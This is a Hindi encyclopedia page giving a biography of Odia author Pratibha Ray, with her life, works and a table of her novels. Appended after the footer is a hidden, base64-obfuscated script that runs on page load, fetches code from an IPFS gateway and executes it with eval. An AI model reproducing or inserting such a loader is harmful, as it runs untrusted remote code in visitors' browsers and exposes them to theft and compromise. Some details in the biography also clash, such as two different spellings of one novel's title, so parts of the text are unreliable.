प्रतिभा राय

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

प्रतिभा राय (अंग्रेज़ी: Pratibha Ray, जन्म- 21 जनवरी, 1943, जगतसिंहपुर, उड़ीसा) उड़िया भाषा की प्रसिद्ध लेखिका हैं। उन्होंने अपने उपन्यासों के माध्यम से सामाजिक अन्याय और भष्ट्राचार के विरुद्ध आवाज़ बुलंद की। उड़ीसा राज्य की बोंडा पहाड़ियों के बोंडा जनजाति पर उनके नृशास्त्रीय अध्ययन को 'अधिभूमि' नाम से प्रकाशित किया गया था। इसे नृशास्त्रीय अध्ययन पर एक श्रेष्ठ कृति माना जाता है। प्रतिभा राय का उपन्यास 'मगनमति' 1999 के महाचक्रवात पर आधारित है। यह उनकी सर्वोत्कृष्ट रचना है।

परिचय

डॉ. प्रतिभा राय का जन्म 21 जनवरी, सन 1943 में उड़ीसा के जगतसिंहपुर ज़िले में हुआ था। अक्षय चंद्र राय इनके जीवन साथी हैं। इनकी तीन संतानें हैं- आद्याशा, अन्वेष और ऐसकान्त।

लेखन कार्य

उपन्यास, लघु कथाएँ, बाल कहानियाँ, आत्मकथा, अनुवाद सहित कई खंडों में गीतों की रचनाएँ प्रतिभा राय ने की हैं। इनका पहला उपन्यास 'वर्षा बसंत बैशाखा' है। उड़ीसा की बोंडा पहाड़ियों के बोंडा जनजाति पर उनके नृशास्त्रीय अध्ययन को 'अधिभूमि' नाम से प्रकाशित किया गया है। इसे नृशास्त्रीय अध्ययन पर एक श्रेष्ठ कृति माना जाता है। उनका उपन्यास 'मगनमति' 1999 के चक्रवात पर आधारित है। डॉ. प्रतिभा राय के 20 उपन्यास, 24 लघुकथा संग्रह, 10 यात्रा वृतांत, दो कविता संग्रह और कई निबंध प्रकाशित हुए हैं। इसमें 'यज्ञनासैनी', 'शिल पदम', 'महामोह', 'उत्तर मार्ग' और 'द्रोपदी' प्रमुख हैं। प्रतिभा राय की प्रमुख रचनाओं का देश की प्रमुख भाषाओं में और अंग्रेज़ी सहित दूसरी विदेशी भाषाओं में भी अनुवाद हुआ है।[1]

कृतियाँ

प्रतिभा राय की प्रमुख कृतियाँ इस प्रकार हैं-

प्रतिभा राय के प्रमुख उपन्यास
क्र.सं. उपन्यास वर्ष क्र.सं. उपन्यास वर्ष
1. बर्षा बसन्त बैशाख 1974 2. अरण्य 1977
3. निषिद्ध पृथिबी 1978 4. परिचय 1979
5. अपरिचिता 1979 6. पूण्यतोया 1979
7. मेघमेदुर 1980 8. आशाबरी 1980
9. अयमारम्भ 1981 10. नीलतृष्णा 1981
11. समुद्रर स्वर 1982 12. शिलापदम् -
13. याज्ञसेनी 1984 14. देहातीत 1986
15. उत्तरमार्ग 1988 16. आदिभूमि -
17. महामोह 1998 18. मग्नमाटि 2004

पुरस्कार व सम्मान


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>